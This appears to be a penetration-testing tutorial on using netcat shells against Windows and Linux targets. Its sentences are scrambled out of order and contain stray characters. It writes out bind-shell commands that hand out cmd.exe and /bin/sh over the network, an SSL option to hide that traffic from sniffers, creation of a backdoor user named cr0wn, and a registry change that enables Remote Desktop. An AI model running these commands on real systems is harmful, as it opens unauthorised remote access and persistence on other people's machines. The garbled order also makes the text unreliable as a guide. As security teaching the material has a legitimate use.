If SSH is not running on the Linux box, I need to start the service, which can be different with various flavors of Linux. Now I can SSH into the target box with my new user account and have terminal access. This command shows the output: root 571 1 0 Mar26 ? 00:00:00 /usr/sbin/sshd -D , so I can check to see whether SSH is running and I can log in for terminal access: ps –aef |grep ssh Next, I need to give the user a password, and this is when having - sslĮnabled on your netcat connection is important.
Now, I can run some commands to see what kind of box I have:Īvoid using any command that requires a password because it will prompt the machine on which the netcat listener is running, which is not the box you are on, and cause your shell to crash.Īdding a user account is another way to get terminal access on your target Linux box, which will work if the netcat listener is running as root (Figure 6). This command connects to the Linux box with an IP address of 10.9.11.32 on port 5555. To hide my conversation from a sniffer on the network. Here, I start a netcat listener on the Linux box and connect to it with: $ ncat 10.9.11.32 5555 The same approach applies as before with Windows, in that I want to allow access to a terminal. Now I will explore the limited shell capability on a Linux box. When you are finished, remove the account you have created with: C:\> net user cr0wn /del To remove this functionality, use the command: > reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
For instance, use the following to allow Remote Desktop to the Windows box: > reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f If there are a limited number of services running on the Windows box, you will need to start those services. Now I have taken a limited shell account on the Windows target and added a user, discovered what services were running and used one of the services (WinSSHD) to log in remotely and get a terminal session. On port 6666 and opening the captured file with wireshark (Figures 1 and 2). Now all of your communication is encrypted. Then, I connect with the command: $ ncat -ssl 10.9.11.32 6666 Option to encrypt: $ ncat -l -ssl –p 6666 –e /bin/sh Something to consider when doing this is, if someone is running a sniffer, this information will be passed in the clear, so you might want to encrypt it. To the windows account with the password password In this example, I have added the user cr0wn Having sysinternals installed on Windows would be a great help, but if it’s not, you can add a new user and log in to get a terminal: net user cr0wn password /ADD A few of the commands that will break your shell are telnet Although this might not seem important, if you have worked a number of hours to get a shell, you don’t want to lose it. Many commands are available, but you should avoid some of them because they will break your shell, and you will have to restart your listener. Now connect to the Windows box from your Linux machine via the netcat listener: ncat 10.10.2.239 5555 You might have to install the program before you continue. Beginning on a Windows machine, open up a command prompt and start a netcat listener: ncat.exe -l -p 5555 -e cmd.exe With netcat, I can illustrate shell access on a Windows target.
Windows shell access has a similar limited command structure, and in this article, I will explore how to navigate shell access and give some interesting tips as well. This shell service is limited some commands will work and others will not. Shell access on a Unix-type server lets you send commands to a target as a user of the system and get a response back (standard input to a shell and standard output from that shell).